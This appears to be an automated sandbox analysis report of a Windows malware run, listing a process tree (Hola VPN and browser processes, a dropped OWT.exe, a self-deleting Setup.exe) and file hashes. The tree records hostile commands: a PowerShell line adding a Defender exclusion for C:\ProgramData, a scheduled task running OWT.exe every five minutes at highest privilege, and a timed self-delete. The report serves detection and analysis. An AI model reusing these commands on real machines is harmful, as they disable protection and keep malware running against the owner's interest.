C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Program Files\Hola\app\hola_svc.exe"C:\Program Files\Hola\app\hola_svc.exe" --report-idle2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --no-default-browser-check --component-updater=fast-update --start-maximized --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile"2⤵
- Executes dropped EXE
- Checks computer location settings
- Enumerates system info in registry
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Roaming\Hola\chromium_profile /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler --monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Roaming\Hola\chromium_profile --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Roaming\Hola\chromium_profile\Crashpad --annotation=plat=Win32 "--annotation=prod=Hola Browser" --annotation=ver=103.0.5060.114 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x6d5b0498,0x6d5b04a8,0x6d5b04b43⤵
- Executes dropped EXE
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Roaming\Hola\chromium_profile /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Roaming\Hola\chromium_profile\Crashpad --annotation=plat=Win32 "--annotation=prod=Hola Browser" --annotation=ver=103.0.5060.114 --initial-client-data=0x1a4,0x1a8,0x1ac,0x180,0x1b0,0xc77840,0xc77850,0xc7785c4⤵
- Executes dropped EXE
-
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1740 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:23⤵
- Executes dropped EXE
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=1928 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵
- Executes dropped EXE
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-GB --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=2128 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵
- Executes dropped EXE
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=2948 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵
- Executes dropped EXE
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=2956 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵
- Executes dropped EXE
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --mojo-platform-channel-handle=3340 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Executes dropped EXE
- Checks computer location settings
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --extension-process --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --mojo-platform-channel-handle=3348 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Executes dropped EXE
- Checks computer location settings
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-GB --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=3596 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-GB --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=3952 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=4076 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵
- Executes dropped EXE
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=4232 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2088 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:23⤵
- Executes dropped EXE
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3996 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:23⤵
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-GB --service-sandbox-type=service --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=4540 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=4712 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=4744 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --mojo-platform-channel-handle=3048 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --mojo-platform-channel-handle=4748 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --mojo-platform-channel-handle=4052 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --extension-process --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --mojo-platform-channel-handle=4776 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --extension-process --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --mojo-platform-channel-handle=5368 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --extension-process --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --mojo-platform-channel-handle=5384 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --extension-process --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --mojo-platform-channel-handle=5744 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --extension-process --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --mojo-platform-channel-handle=5736 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --extension-process --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --mojo-platform-channel-handle=5732 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-GB --service-sandbox-type=service --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=4668 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-GB --service-sandbox-type=service --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=3384 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=6212 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --extension-process --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --mojo-platform-channel-handle=6100 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --mojo-platform-channel-handle=6820 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --mojo-platform-channel-handle=6928 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --extension-process --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --mojo-platform-channel-handle=6960 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:13⤵
- Checks computer location settings
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=proxy_resolver.mojom.ProxyResolverFactory --lang=en-GB --service-sandbox-type=service --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=5924 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵
-
-
C:\Program Files\Hola\app\chromium\hola_cr.exe"C:\Program Files\Hola\app\chromium\hola_cr.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Hola\chromium_profile" --mojo-platform-channel-handle=5548 --field-trial-handle=1824,i,15430201298890332653,1384352099983240687,131072 /prefetch:83⤵
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1816 -ip 18161⤵
-
C:\ProgramData\winrar\OWT.exeC:\ProgramData\winrar\OWT.exe1⤵
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"2⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\system32\sc.exesc query luminati_net_updater_org_hola1⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc query luminati_net_updater_win_hola_org_p21⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc query luminati_net_updater_win_hola_un_ext_hola_org1⤵
-
C:\Windows\system32\sc.exesc query luminati_net_updater_org_hola_browser_updater1⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc query luminati_net_updater_win_hola_browser_and_vpn_hola_org1⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc query luminati_net_updater_org_hola_vpn1⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc query luminati_net_updater_win_hola_off_abtest_hola_org1⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc query luminati_net_updater_win_hola_on_abtest_hola_org1⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc query luminati_net_updater_win_hola_browser_noconsent_nopeer_hola_org1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffedac74f50,0x7ffedac74f60,0x7ffedac74f702⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost1⤵
-
C:\Users\Admin\Desktop\Setup.exe"C:\Users\Admin\Desktop\Setup.exe"1⤵
- Checks computer location settings
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Desktop\Setup.exe" & exit2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
-
C:\ProgramData\winrar\OWT.exeC:\ProgramData\winrar\OWT.exe1⤵
- Checks computer location settings
-
C:\Program Files\Softdeluxe\Free Download Manager\helperservice.exe"C:\Program Files\Softdeluxe\Free Download Manager\helperservice.exe"1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD5073a3dc0c60492b618f888c5e603fd05
SHA14de52c57f8f032724452e901120bcf0fbee52902
SHA256f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27
SHA5124262dd0e07f0d083c75607a0a67e20b8b8f85c57aeeba2359cc92731a82ba9d2191482cb3d28c7c8f1163b0d9604bf1cfba5ffe168ad7bb6fc7c1c11c99c0d7f
-
Filesize
1.4MB
MD5073a3dc0c60492b618f888c5e603fd05
SHA14de52c57f8f032724452e901120bcf0fbee52902
SHA256f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27
SHA5124262dd0e07f0d083c75607a0a67e20b8b8f85c57aeeba2359cc92731a82ba9d2191482cb3d28c7c8f1163b0d9604bf1cfba5ffe168ad7bb6fc7c1c11c99c0d7f
-
Filesize
1.4MB
MD5073a3dc0c60492b618f888c5e603fd05
SHA14de52c57f8f032724452e901120bcf0fbee52902
SHA256f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27
SHA5124262dd0e07f0d083c75607a0a67e20b8b8f85c57aeeba2359cc92731a82ba9d2191482cb3d28c7c8f1163b0d9604bf1cfba5ffe168ad7bb6fc7c1c11c99c0d7f
-
Filesize
40B
MD560cd6e50a74c45f9514c2ec70fe16a0d
SHA14d09cb4351688681c28912f89869703fc3a98c0a
SHA25632fc80412bdafb44620e9694a7a9e1328c6067977021068d93061ee7753522d1
SHA512cbab6f727cfedfeddd32fb9763479530530b79df262d09f319fecac9f89d9e08a5f38331f85f26930a35bf6e5bac01821b8edea4bd2b3abec5db55ff4468857e
-
Filesize
40B
MD560cd6e50a74c45f9514c2ec70fe16a0d
SHA14d09cb4351688681c28912f89869703fc3a98c0a
SHA25632fc80412bdafb44620e9694a7a9e1328c6067977021068d93061ee7753522d1
SHA512cbab6f727cfedfeddd32fb9763479530530b79df262d09f319fecac9f89d9e08a5f38331f85f26930a35bf6e5bac01821b8edea4bd2b3abec5db55ff4468857e
-
Filesize
88KB
MD58791f640953d16706799f0e174c0b178
SHA1a402ed34838a52c3ea67b3303a62d400c9f1900d
SHA256ddceb17df76f48b14de37aa7410622ed5020135dc6ed4c1c1aba3f6ad99f3a8a
SHA512a50cbd65c84b64d958a0990e9e63c759db76be27b18855309099e1f8b7b91a88e643f28ad1a1b54a3c613320aaf855d55849ef13466f5bc1d6c70fc785333d3d
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
138B
MD5cd8f7d9127705c7a9d11ddc1e917459c
SHA19c8787273320932cd174a49c67be7c088721cb6b
SHA256cd93743b49ab5ba05c6b0d205e69eead65b0f0ac38db960f4cd3b8790a99911f
SHA512313286346f3d9b5b98b5b662b0dc5bf43bad958218444f308ddae2d98c5051ba73b5056d4abc6f817117f307e698519ab8ae7e13b614b781f29b2e3ab7740786
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
1.6MB
-
Filesize
10.8MB
-
Filesize
1.8MB
-
Filesize
756KB
-
Filesize
1.4MB
-
Filesize
10.8MB
-
Filesize
1.8MB
-
Filesize
156KB
-
Filesize
632KB
-
Filesize
10.8MB
-
Filesize
260KB
-
Filesize
72KB
-
Filesize
